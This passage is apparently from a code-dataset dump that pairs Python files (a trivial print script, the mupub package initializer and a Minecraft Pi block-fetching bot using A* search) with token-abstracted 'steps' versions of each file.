index
int64
0
100k
blob_id
stringlengths
40
40
code
stringlengths
7
7.27M
steps
sequencelengths
1
1.25k
error
bool
2 classes
0
aff1a9263e183610f403a4d6a7f27b45eacb7ff2
name='valentina ' print(name*1000)
[ "name='valentina '\nprint(name*1000)\n", "name = 'valentina '\nprint(name * 1000)\n", "<assignment token>\nprint(name * 1000)\n", "<assignment token>\n<code token>\n" ]
false
1
eabf06481509962652812af67ad59da5cfe30fae
""" mupub module. """ __all__ = ( '__title__', '__summary__', '__version__', '__author__', '__license__', '__copyright__', ) __title__ = 'mupub' __summary__ = 'Musical score publishing utility for the Mutopia Project' """Versioning: This utility follows a MAJOR . MINOR . EDIT format. Upon a major release, the MAJOR number is incremented and the MINOR is zeroed. During development of an upcoming release, the MINOR number may be incremented. """ __version__ = '1.0.8' __author__ = 'Glen Larsen, Chris Sawer' __author_email__= '[email protected]' __uri__ = 'http://mutopiaproject.org/' __license__ = 'MIT' __copyright__ = 'Copyright 2018 The Mutopia Project' from .assets import collect_assets from .commands.build import build from .commands.check import check from .commands.init import init from .commands.tag import tag from .commands.clean import clean from .config import CONFIG_DICT, CONFIG_DIR, getDBPath from .config import test_config, saveConfig from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE from .core import id_from_footer from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException from .header import Loader, LYLoader, VersionLoader from .header import RawLoader, Header, REQUIRED_FIELDS from .header import find_header from .lily import LyLocator, LyVersion from .validate import Validator, DBValidator, in_repository from .tagedit import tag_header, tag_file from .rdfu import NS, MuRDF from .utils import resolve_input,resolve_lysfile
[ "\"\"\" mupub module.\n\"\"\"\n\n__all__ = (\n '__title__', '__summary__', '__version__',\n '__author__', '__license__', '__copyright__',\n)\n\n\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n\n\"\"\"Versioning:\nThis utility follows a MAJOR . MINOR . EDIT format. Upon a major\nrelease, the MAJOR number is incremented and the MINOR is zeroed.\nDuring development of an upcoming release, the MINOR number may be\nincremented.\n\n\"\"\"\n__version__ = '1.0.8'\n\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__= '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\n\nfrom .assets import collect_assets\nfrom .commands.build import build\nfrom .commands.check import check\nfrom .commands.init import init\nfrom .commands.tag import tag\nfrom .commands.clean import clean\nfrom .config import CONFIG_DICT, CONFIG_DIR, getDBPath\nfrom .config import test_config, saveConfig\nfrom .core import MUTOPIA_BASE, FTP_BASE, URL_BASE\nfrom .core import id_from_footer\nfrom .exceptions import BadConfiguration, IncompleteBuild, TagProcessException\nfrom .header import Loader, LYLoader, VersionLoader\nfrom .header import RawLoader, Header, REQUIRED_FIELDS\nfrom .header import find_header\nfrom .lily import LyLocator, LyVersion\nfrom .validate import Validator, DBValidator, in_repository\nfrom .tagedit import tag_header, tag_file\nfrom .rdfu import NS, MuRDF\nfrom .utils import resolve_input,resolve_lysfile\n", "<docstring token>\n__all__ = ('__title__', '__summary__', '__version__', '__author__',\n '__license__', '__copyright__')\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n<docstring token>\n__version__ = '1.0.8'\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__ = '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\nfrom .assets import collect_assets\nfrom .commands.build import build\nfrom .commands.check import check\nfrom .commands.init import init\nfrom .commands.tag import tag\nfrom .commands.clean import clean\nfrom .config import CONFIG_DICT, CONFIG_DIR, getDBPath\nfrom .config import test_config, saveConfig\nfrom .core import MUTOPIA_BASE, FTP_BASE, URL_BASE\nfrom .core import id_from_footer\nfrom .exceptions import BadConfiguration, IncompleteBuild, TagProcessException\nfrom .header import Loader, LYLoader, VersionLoader\nfrom .header import RawLoader, Header, REQUIRED_FIELDS\nfrom .header import find_header\nfrom .lily import LyLocator, LyVersion\nfrom .validate import Validator, DBValidator, in_repository\nfrom .tagedit import tag_header, tag_file\nfrom .rdfu import NS, MuRDF\nfrom .utils import resolve_input, resolve_lysfile\n", "<docstring token>\n__all__ = ('__title__', '__summary__', '__version__', '__author__',\n '__license__', '__copyright__')\n__title__ = 'mupub'\n__summary__ = 'Musical score publishing utility for the Mutopia Project'\n<docstring token>\n__version__ = '1.0.8'\n__author__ = 'Glen Larsen, Chris Sawer'\n__author_email__ = '[email protected]'\n__uri__ = 'http://mutopiaproject.org/'\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2018 The Mutopia Project'\n<import token>\n", "<docstring token>\n<assignment token>\n<docstring token>\n<assignment token>\n<import token>\n" ]
false
2
54f0ed5f705d5ada28721301f297b2b0058773ad
"""Module for the bot""" from copy import deepcopy from time import sleep import mcpi.minecraft as minecraft from mcpi.vec3 import Vec3 import mcpi.block as block from search import SearchProblem, astar, bfs from singleton import singleton _AIR = block.AIR.id _WATER = block.WATER.id _LAVA = block.LAVA.id _BEDROCK = block.BEDROCK.id _DROP = 2 # It can drop at most this many _DROP_PLUS_1 = _DROP + 1 _DELAY = 1 class _Vec3(Vec3): """A Vec3 that is hashable. Everything in this program should use this class.""" def __hash__(self): """Return the hash.""" return hash((self.x, self.y, self.z)) def clone(self): """Return a clone.""" return _Vec3(self.x, self.y, self.z) class _GenericBot: """A generic bot.""" def __init__(self, pos, inventory=None): """Initialize with an empty inventory. inventory is a dictionary. If None, an empty one will be used.""" if inventory is None: self._inventory = {} else: self._inventory = deepcopy(inventory) self._pos = deepcopy(pos) def take_action(self, action): """Take the action (acquired from _get_legal_actions).""" getattr(self, action['func'])( *action.get('args', ()), **action.get('kwargs', {}) ) def take_actions(self, actions, seconds=None): """Take these actions. If seconds is not None, sleep 'seconds' seconds. """ if not actions: return self.take_action(actions[0]) for action in actions[1:]: if seconds is not None: sleep(seconds) self.take_action(action) def get_pos(self): """Return the position.""" return deepcopy(self._pos) def get_legal_actions(self, block_=None): """Return a list of legal actions. If block_ is None, return all legal actions. Otherwise, return all legal actions that don't involve placing the block.""" return self._get_move_actions(block_) + self._get_mine_actions() + \ self._get_placement_actions(block_) def contains(self, block_): """Return whether or not the bot contains the block id.""" return block_ in self._inventory def _get_block(self, pos): """Get the block at the position.""" raise NotImplementedError def _place(self, loc, exclude=None, block_=None): """Place a block from the inventory only. If exclude is not None, place a block that is not 'exclude'. If block is not None, place that block only. """ if not self._inventory: raise Exception('Inventory empty') if block_ is None: for key in self._inventory: if key != exclude: block_ = key break else: raise Exception(( 'You requested not to place %s, but it is the only ' 'block in the inventory.' % exclude )) if block_ not in self._inventory: raise Exception('Block %s is not in the inventory' % block_) if self._inventory[block_] == 1: del self._inventory[block_] else: self._inventory[block_] -= 1 self._set_block(loc, block_) def _move_down(self): """Move and mine the block below.""" new_pos = self._pos + _Vec3(0, -1, 0) block_ = self._get_block(new_pos) if block_ != _WATER: self._add_to_inv(block_) self._move(new_pos) def _add_to_inv(self, block_): """Add the block to the inventory.""" if block_ in self._inventory: self._inventory[block_] += 1 else: self._inventory[block_] = 1 def _move_up(self, exclude=None): """Move and place a block below. If exclude is not None, place a block that is not 'exclude'. """ self._move(self._pos + _Vec3(0, 1, 0)) self._place(self._pos + _Vec3(0, -1, 0), exclude) def _mine(self, loc): """Mine the block.""" block_ = self._get_block(loc) self._add_to_inv(block_) self._set_block(loc, _AIR) def _get_move_actions(self, exclude=None): """Return a list of legal movement actions. exclude is the block to exclude. """ rtn = [] # Check for moving up can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER} if can_move_up: if self._surrounded(): rtn.append({ 'func': '_move', 'args': (self._pos + _Vec3(0, 1, 0),) }) else: rtn.append({ 'func': '_move_up', 'args': (exclude,) }) # Check for moving down hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0)) if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}: rtn.append({'func': '_move_down'}) # Check for side moves for dir_ in _adj_dirs(): rtn.extend(self._side_moves(dir_, can_move_up)) return rtn def _side_moves(self, dir_, can_move_up): """Return the list of side moves. dir_ is an adjacent direction. can_move_up is a boolean for whether or not the bot can move up. """ rtn = [] base_pos = self._pos + dir_ base_block = self._get_block(base_pos) empty_blocks = {_AIR, _WATER} # Check if it can move up if can_move_up and base_block not in {_AIR, _LAVA, _WATER}: for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]: if self._get_block(base_pos + vert_dir) not in empty_blocks: break else: rtn.append({ 'func': '_move', 'args': (base_pos + _Vec3(0, 1, 0),) }) # Check if it can move in that direction for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]: if self._get_block(base_pos + vert_dir) not in empty_blocks: break # Fall else: pos = base_pos + _Vec3(0, -1, 0) for _ in xrange(_DROP_PLUS_1): block_ = self._get_block(pos) if block_ != _AIR: if block_ != _LAVA: rtn.append({ 'func': '_move', 'args': (pos + _Vec3(0, 1, 0),) }) break pos.y -= 1 def _surrounded(self): """Return whether or not the bot is surrounded by water.""" for dir_ in _adj_dirs(): if self._get_block(self._pos + dir_) != _WATER: return False return True def _get_mine_actions(self): """Return a list of legal mining actions (that only involve mining and not moving).""" rtn = [] dont_mine = {_AIR, _WATER, _LAVA} # Mine above. pos_above = self._pos + _Vec3(0, 2, 0) if self._get_block(pos_above) not in dont_mine: rtn.append({ 'func': '_mine', 'args': (pos_above,) }) for dir_ in _adj_dirs(): pos = self._pos + dir_ for _ in xrange(2): if self._get_block(pos) not in dont_mine: rtn.append({ 'func': '_mine', 'args': (pos,) }) pos = pos + _Vec3(0, 1, 0) return rtn def _get_placement_actions(self, exclude=None): """Return a list of legal actions that only involve placing a block from the inventory. exclude is a block id. It is the block that should not be placed. If None, any block can be placed.""" if not self._has_blocks_to_place(exclude=exclude): return [] dirs = [_Vec3(0, 2, 0)] for dir_ in _adj_dirs(): dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)]) if self._get_block(self._pos + dir_) in [_AIR, _WATER]: dirs.append(dir_ + _Vec3(0, -1, 0)) rtn = [] for dir_ in dirs: pos = self._pos + dir_ if self._can_place(pos): rtn.append({ 'func': '_place', 'args': (pos,), 'kwargs': {'exclude': exclude} }) return rtn def _can_place(self, loc): """Return whether or not the bot can place a block at that location independent of what it has in its inventory.""" non_blocks = [_AIR, _WATER, _LAVA] player = [self._pos, self._pos + _Vec3(0, 1, 0)] for dir_ in _adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]: new_loc = loc + dir_ if new_loc not in player and self._get_block(new_loc) \ not in non_blocks: return True return False def _has_blocks_to_place(self, exclude=None): """Return whether or not the bot can place a block from the inventory. If exclude is None, any block can be placed.""" for block_ in self._inventory: if block_ != exclude: return True return False def _set_block(self, pos, block_): """Set a block. block_ is the block id.""" raise NotImplementedError def _move(self, pos): """Move there only.""" self._pos = deepcopy(pos) class _ImaginaryBot(_GenericBot): """A bot used for finding paths that doesn't actually change blocks in the world.""" def __init__(self, pos, inventory=None): """Create a new bot.""" _GenericBot.__init__(self, pos, inventory) self._changes = {} # Changes to the world def _set_block(self, pos, block_): """Set a block. block_ is the block id.""" self._changes[deepcopy(pos)] = block def _get_block(self, pos): """Get the block at the position.""" if pos in self._changes: return self._changes[pos] else: return _get_mc().getBlock(pos) def get_block(self, pos): """The public version.""" return self._get_block(pos) def __hash__(self): """Return the hash.""" return hash(frozenset([self._pos] + \ _key_vals(self._inventory) + \ _key_vals(self._changes) )) class Bot(_GenericBot): """The real bot. All vector arguments are Vec3s.""" _BOT_BLOCK = block.IRON_BLOCK.id def __init__(self): """Create a bot next to the player.""" pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0) pos = _Vec3(pos.x, pos.y, pos.z) _GenericBot.__init__(self, pos) self._pos = pos self._move(self._pos) @staticmethod def destroy_all(): """Destroy all bots within a small distance (in case I forget to destroy one).""" player_loc = _player_loc() minec = _get_mc() rad = 10 for x in xrange(player_loc.x - rad, player_loc.x + rad): for y in xrange(player_loc.y - rad, player_loc.y + rad): for z in xrange(player_loc.z - rad, player_loc.z + rad): if minec.getBlock(x, y, z) == Bot._BOT_BLOCK: minec.setBlock(x, y, z, _AIR) def destroy(self): """Set itself to air.""" self._set_block(self._pos, _AIR) self._set_block(self._pos + _Vec3(0, 1, 0), _AIR) def fetch(self, block_name): """Mine and return a block to the player.""" imag_bot = _ImaginaryBot(self._pos, self._inventory) block_id = getattr(block, block_name).id block_loc = self._get_block_loc(block_id) mine_prob = _MineProblem(imag_bot, block_loc, block_id) mine_actions = astar(mine_prob, _mine_heuristic) self.take_actions(mine_actions, _DELAY) imag_bot = _ImaginaryBot(self._pos, self._inventory) player_loc = _player_loc() return_prob = _ReturnProblem(imag_bot, block_id, player_loc) return_actions = astar(return_prob, _return_heuristic) imag_bot.take_actions(return_actions) return_actions.append({ 'func': '_place', 'args': (imag_bot.get_pos() + player_loc) / 2, 'kwargs': {'block': block_id} }) self.take_actions(return_actions, _DELAY) def _get_block_loc(self, block_id): """Return the location of the block.""" find_prob = FindProblem(self._pos, block_id) dirs = bfs(find_prob) return self._pos + sum(dirs) def _set_block(self, pos, block_): """Place an actual block in the world. block is a block id.""" _get_mc().setBlock(pos, block_) def _get_block(self, pos): """Get the block at the position.""" return _get_mc().getBlock(pos) def _move(self, pos): """Move there, and set the appropriate blocks.""" self._set_block(self._pos, _AIR) self._set_block(self._pos + _Vec3(0, 1, 0), _AIR) self._set_block(pos, self._BOT_BLOCK) self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK) self._pos = pos class FindProblem(SearchProblem): """Problem for finding the location of a block in the world. A state in this problem is a location. """ def __init__(self, start_loc, block_id): """Initialize.""" self._start_loc = deepcopy(start_loc) self._block_id = block_id def getStartState(self): """Return the starting location.""" return self._start_loc def isGoalState(self, state): return _get_mc().getBlock(state) == self._block_id def getSuccessors(self, state): """Return the successors.""" rtn = [] for dir_ in _all_dirs(): successor = state + dir_ if successor.y <= _get_mc().getHeight(successor.x, successor.z) \ and _get_mc().getBlock(successor) != _BEDROCK: rtn.append((successor, dir_, 1)) return rtn class _MineProblem(SearchProblem): """The problem of finding the block and mining it (not returning it).""" def __init__(self, imag_bot, block_loc, block_id): """Initialize the problem with an _ImaginaryBot. block_loc is a Vec3. """ self._bot = imag_bot self._block_loc = deepcopy(block_loc) self._block_id = block_id def get_block_loc(self): """Return the block location.""" return deepcopy(self._block_loc) def get_block_id(self): """Return the block it's trying to mine.""" return self._block_id def getStartState(self): """Return the bot passed in.""" return self._bot def isGoalState(self, state): """Return whether or not the bot has the block.""" return state.contains(self._block_id) def getSuccessors(self, state): """Return the successors.""" rtn = [] for action in state.get_legal_actions(): successor = deepcopy(state) successor.take_action(action) rtn.append((successor, action, 1)) return rtn class _ReturnProblem(SearchProblem): """The problem of returning to the player. This does not place the block next to the player.""" def __init__(self, imag_bot, block_, player_loc): """Initialized the problem with an _ImaginaryBot. block is a block id.""" self._bot = imag_bot self._block = block_ self._player_loc = player_loc def get_player_loc(self): """Return the player location.""" return deepcopy(self._player_loc) def getStartState(self): """Return the bot passed in.""" return self._bot def isGoalState(self, state): """Return whether or not the bot is next to the player.""" diff = state.get_pos() - self._player_loc return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \ abs(diff.x) + abs(diff.z) == 2 and \ state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \ (_AIR, _LAVA, _WATER) def getSuccessors(self, state): """Return the successors.""" rtn = [] for action in state.get_legal_actions(self._block): successor = deepcopy(state) successor.take_action(action) rtn.append((successor, action, 1)) return rtn def _mine_heuristic(bot, problem): """Return the mining heuristic. bot is an _ImaginaryBot. """ if bot.contains(problem.get_block_id()): return 0 bot_pos = bot.get_pos() dest_pos = problem.get_block_loc() # If man == dy: return man + 1 # If man > dy: return man # If man < dy: return dy? man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z)) y_diff = bot_pos.y - dest_pos.y if y_diff < 0: y_diff += 1 if y_diff == 0: return man_dist # Transform so that it's only dropping drop = _DROP if y_diff > 0 else 1 y_diff = abs(y_diff) drops = _drops(y_diff, drop) if man_dist > drops: return man_dist if man_dist == drops: return man_dist + 1 if drop == 1: return drops if y_diff % drop == 1: return drops return drops + 1 def _drops(dist, drop): """Return the number of times it takes to drop a distance dist. drop is the length of one drop. Both are assumed positive.""" rtn = dist / drop if dist % drop != 0: rtn += 1 return rtn def _return_heuristic(bot, problem): """Return the return heuristic. bot is an _ImaginaryBot. """ bot_pos = bot.get_pos() player_pos = problem.get_player_loc() bot_plane_pos = (bot.x, bot.z) y_diff = bot_pos.y - player_pos.y drop = _DROP if y_diff > 0 else 1 y_diff = abs(y_diff) drops = _drops(y_diff, drop) min_man = float('inf') for dir_ in _adj_dirs(): loc = player_pos + 2 * dir_ man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z)) if man_dist < min_man: min_man = man_dist if man_dist < drops: return drops return min_man def _to_my_vec3(vec): """Return the _Vec3 alternative of the Vec3.""" return _Vec3(vec.x, vec.y, vec.z) def _player_loc(): """Return the player's location.""" return _to_my_vec3(_get_mc().player.getTilePos()) def _adj_dirs(): """Return the adjacent directions.""" return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)] def _all_dirs(): """Return all adjacent directions.""" return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)] def _manhattan(pos1, pos2): """Return the manhattan distance. pos1 and pos2 should be iterable.""" return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2)) @singleton def _get_mc(): """Return the Minecraft instance.""" return minecraft.Minecraft.create() def _key_vals(dict_): """Return a list of key-val tuples.""" return [(key, val) for key, val in dict_.iteritems()]
[ "\"\"\"Module for the bot\"\"\"\n\nfrom copy import deepcopy\nfrom time import sleep\n\nimport mcpi.minecraft as minecraft\nfrom mcpi.vec3 import Vec3\nimport mcpi.block as block\n\nfrom search import SearchProblem, astar, bfs\nfrom singleton import singleton\n\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n\n_DROP = 2 # It can drop at most this many\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(\n *action.get('args', ()), \n **action.get('kwargs', {})\n )\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions() + \\\n self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception((\n 'You requested not to place %s, but it is the only '\n 'block in the inventory.' % exclude\n ))\n\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n\n self._set_block(loc, block_)\n \n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n \n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n\n # Check for moving up\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR, _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({\n 'func': '_move',\n 'args': (self._pos + _Vec3(0, 1, 0),)\n })\n else:\n rtn.append({\n 'func': '_move_up',\n 'args': (exclude,)\n })\n\n # Check for moving down\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n\n # Check for side moves \n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n\n # Check if it can move up\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({\n 'func': '_move',\n 'args': (base_pos + _Vec3(0, 1, 0),)\n })\n\n # Check if it can move in that direction\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n\n # Fall\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({\n 'func': '_move',\n 'args': (pos + _Vec3(0, 1, 0),)\n })\n break\n pos.y -= 1 \n \n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n # Mine above.\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({\n 'func': '_mine',\n 'args': (pos_above,)\n })\n\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({\n 'func': '_mine',\n 'args': (pos,)\n })\n pos = pos + _Vec3(0, 1, 0)\n\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({\n 'func': '_place',\n 'args': (pos,),\n 'kwargs': {'exclude': exclude}\n })\n\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in _adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc) \\\n not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {} # Changes to the world\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + \\\n _key_vals(self._inventory) + \\\n _key_vals(self._changes)\n ))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({\n 'func': '_place',\n 'args': (imag_bot.get_pos() + player_loc) / 2,\n 'kwargs': {'block': block_id}\n })\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z) \\\n and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 